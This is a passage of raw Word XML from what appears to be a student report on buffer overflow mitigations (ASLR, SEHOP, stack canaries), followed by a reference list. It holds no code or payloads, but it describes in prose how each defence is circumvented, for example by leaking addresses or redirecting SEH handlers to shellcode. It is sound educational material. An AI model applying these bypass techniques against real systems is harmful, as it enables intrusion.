          <w:rFonts w:ascii="Arial" w:eastAsia="F" w:hAnsi="Arial" w:cs="F"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="112A97A5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="F"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ASLR is another modern countermeasure to buffer overflow attacks adopted by most modern operating systems. The principle is to randomly offset the memory so that, if an attacker locates a useful memory location like EIP or a return command and then they try to use it, the offset will be different when they go to use or manipulate that location (Inc., 2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A085827" w14:textId="421EBAEB" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="F"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>However, ASLR is not f</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:rPr>
          <w:rFonts w:eastAsia="F"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>oo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="F"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>lproof. It does nothing to prevent vulnerabilities but rather just makes them more difficult. For example, if a memory address is leaked then it can be used to determine the offset being used and thereby completely circumvent this protection. Alternatively, by using relative addresses it is possible to identify an address by its distance from a known address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Henry-Stocker, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2AA763" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc71564015"/>
    </w:p>
    <w:p w14:paraId="086444EE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>SEHOP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="09B50846" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010B268C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SEHOP attempts to prevent the abuse of the Structural Exceptions Management (SEH) procedure. Attacks using this involve overwriting an exception registration record on the stack to point to the attacker’s shellcode. SEHOP prevents this by verifying the integrity of the chain before redirecting execution. This is done by looking at the first and last two addresses. These are the handler bytes, where the first points to the memory address of the exception and the last two point to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ntdll!_</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>exept_handler4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D2766B" w14:textId="41E8D293" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SEHOP is very difficult to circumvent, especially in a system that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ut</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>lises</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DEP and ASLR alongside it. That is not to say, however, that it is impossible to break. Circumventing SEHOP, put simply, takes advantage of the control granted to exception handlers by the operating system to craft a payload that sends the handler to a valid address. However, this address can then be set as a “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">” command to where the shellcode has been inserted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Berre</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Cauquil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C15AB21" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46530889" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc71564016"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Canaries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="7A7B555E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6887030A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>One of the more simplistic methods of preventing an overflow exploit is a Canary. This is a reference to a coal mine canary, which is an apt metaphor for what this does. The Canary is a form of intrusion detection that works by dynamically generating a value that will be verified before the return command is triggered. This would alert the program if the buffer had been tampered with and allow it to safely exit before the shellcode has been executed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Trimmer, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8C7545" w14:textId="3704617B" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>This is obviously only effective while the canary is unknown to the attacker. If the correct value can be obtained, then this prevention method is easily circumvented. Older versions of canaries were static values that could be read directly from memory once located. More modern Canaries use a</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> XOR algorithm to randomize their contents. This is far more effective but not f</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>oo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>lproof as, if the attacker extracts the Canary, the algorithm and the code for re-encoding the original Canary into the Canary, then this can still be circumvented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(Buffer Overflow Protection - Canaries - Random XOR Canaries, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B9B5B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc71564017"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="5A03A9E1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="19" w:right="919"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Armoredcode.com. 2021. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">A closer look to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>msf-egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. [online] Available at: &lt;https://armoredcode.com/blog/a-closer-look-to-msf-egghunter/&gt; [Accessed 27 April 2021].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599902F0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="19" w:right="919"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bradshaw, S., 2021. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SEH Based Overflow Exploit Tutorial - Infosec Resources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. [online] Infosec Resources. Available at: &lt;https://resources.infosecinstitute.com/topic/seh-exploit/&gt; [Accessed 20 April 2021].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E12A819" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Liquisearch.com. 2021. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Buffer Overflow Protection - Canaries - Random XOR Canaries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. [online] Available at: &lt;https://www.liquisearch.com/buffer_overflow_protection/canaries/random_xor_canaries&gt; [Accessed 10 May 2021].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC7AB0A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cyberwarzone</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Hacking made easy with this POWERFULL tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. [online] Available at: &lt;https://cyberwarzone.com/msfvenom-create-reverse-tcp-payload-kali-linux/&gt; [Accessed 14 April 2021].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F95DF2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3945"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Henry-Stocker, S., 2021. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>How ASLR protects Linux systems from buffer overflow attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. [online] Network World. Available at: &lt;https://www.networkworld.com/article/3331199/what-does-aslr-do-for-linux.html&gt; [Accessed 9 May 2021].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1395F96A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3945"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Inc., 2021. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Preventing and mitigation methods buffer overflow attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>❗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">️ Part 2 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Wallarm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. [online] Wallarm.com. Available at: &lt;https://www.wallarm.com/what/buffer-overflow-attack-preventing-and-mitigation-methods-part-2&gt; [Accessed 10 May 2021].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E0B94" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3945"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Berre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, S. and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cauquil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, D., 2021. [online] Dl.packetstormsecurity.net. Available at: &lt;https://dl.packetstormsecurity.net/papers/general/sehop_en.pdf&gt; [Accessed 10 May 2021].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F3630" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3945"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Team, S., 2021. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>How to detect, prevent, and mitigate buffer overflow attacks | Synopsys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. [online] Software Integrity Blog. Available at: &lt;https://www.synopsys.com/blogs/software-security/detect-prevent-and-mitigate-buffer-overflow-attacks/&gt; [Accessed 7 May 2021].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AE8802" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3945"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Trimmer, J., 2021. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Buffer Overflows, ASLR, and Stack Canaries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. [online] RIT Computing Security Blog. Available at: &lt;https://ritcsec.wordpress.com/2017/05/18/buffer-overflows-aslr-and-stack-canaries/&gt; [Accessed 4 May 2021].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A493E3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3945"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Watters, B., 2021. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Stack-Based Buffer Overflow Attacks: Explained | Rapid7 | Rapid7 Blog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. [online] Rapid7. Available at: &lt;https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/&gt; [Accessed 20 April 2021].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA392B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3945"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cloudflare. 2021. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>What is Buffer Overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
